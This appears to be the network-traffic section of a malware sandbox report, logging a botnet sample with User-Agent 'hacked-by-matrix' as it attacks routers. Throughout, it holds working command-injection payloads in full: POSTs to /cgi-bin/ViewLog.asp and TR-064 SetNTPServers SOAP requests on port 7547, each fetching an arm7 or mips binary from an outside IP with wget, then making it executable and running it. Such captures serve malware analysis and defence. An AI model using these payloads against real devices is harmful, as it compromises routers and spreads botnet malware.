                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.1352334169.255.59.8980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.754463911 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.134714482.78.35.9180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.781409025 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.437525034 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.638904095 CET419INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 06:24:19 GMT
                                                        Server: webserver
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 195
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=8, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.1343790178.22.56.23780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.034823895 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.221007109 CET530INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:10 GMT
                                                        Server: Apache/2
                                                        Content-Length: 315
                                                        Keep-Alive: timeout=2, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                        Mar 21, 2024 05:23:10.221046925 CET406INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:10 GMT
                                                        Server: Apache/2
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.1332894178.114.229.3380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.061660051 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:11.148286104 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.135530680.218.134.23180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.061674118 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:11.148296118 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:11.368103027 CET166INHTTP/1.1 404 Not Found
                                                        Server: ReeCam IP Camera
                                                        Date: Thu, 21 Mar 2024 04:25:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 126
                                                        Connection: close
                                                        Mar 21, 2024 05:23:11.368191004 CET138INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.1360778125.149.162.2097547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.118794918 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.1333400181.94.213.20780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.310163975 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.582165956 CET301INHTTP/1.1 200 OK
                                                        Content-Type:text/html
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Mar 21, 2024 05:23:10.582376957 CET1286INData Raw: 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: cb8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                        Mar 21, 2024 05:23:10.582463980 CET1286INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20
                                                        Data Ascii: return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6
                                                        Mar 21, 2024 05:23:10.582784891 CET732INData Raw: 72 65 73 73 56 61 6c 69 64 28 48 6f 73 74 49 6e 66 6f 29 29 0d 0a 7b 0d 0a 2f 2a 20 68 6f 73 74 20 73 74 72 69 6e 67 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 70 6f 72 74 20 2a 2f 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70
                                                        Data Ascii: ressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.133532872.141.50.137547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.388569117 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.1358196216.239.179.2057547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.388727903 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.1346518220.211.175.2457547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.505666971 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
